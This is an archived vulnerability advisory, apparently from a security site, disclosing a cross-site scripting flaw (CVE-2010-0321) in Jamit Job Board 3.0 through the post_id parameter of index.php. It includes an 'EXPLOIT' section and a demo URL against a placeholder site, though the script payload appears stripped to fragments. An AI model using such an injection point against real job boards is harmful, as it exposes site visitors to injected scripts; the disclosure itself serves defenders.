Bug: Jamit Job Board 3.0 cross site scripting (WLB-2010010034 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Jamit Job Board 3.0 cross site scripting
 Credit: Crux
 Date: 2010.01.12
 CWE: CWE-79 (Show similar)
 CVE: CVE-2010-0321 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes



##########################################################

[+] Exploit Title: Jamit Job Board v.3
[+] Date: January 09 2010
[+] Author: Crux [mail:cruxtheking@live.com]
[+] Software Link: http://www.jamit.com/jobs/
[+] Version: 3.0
[+] Tested on: ALL
[+] Dork: NO NO NO!

[ Vulnerable File ]

index.php
(The post variable, post_id)


[ EXPLOIT ]

">

[ DEMO ]
http://sitename.com/jobs/index.php?type=111-222-1933email@address.tst&mode=view&pin_x=0&pin_y=0&post_id=
1>">


[+] Greetz to the peeps at hack-tech.com.

#############

References:

http://xforce.iss.net/xforce/xfdb/55500
http://www.securityfocus.com/bid/37701
http://www.exploit-db.com/exploits/11073
http://secunia.com/advisories/32797
http://packetstormsecurity.org/1001-exploits/jamitjobboard-xss.txt

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com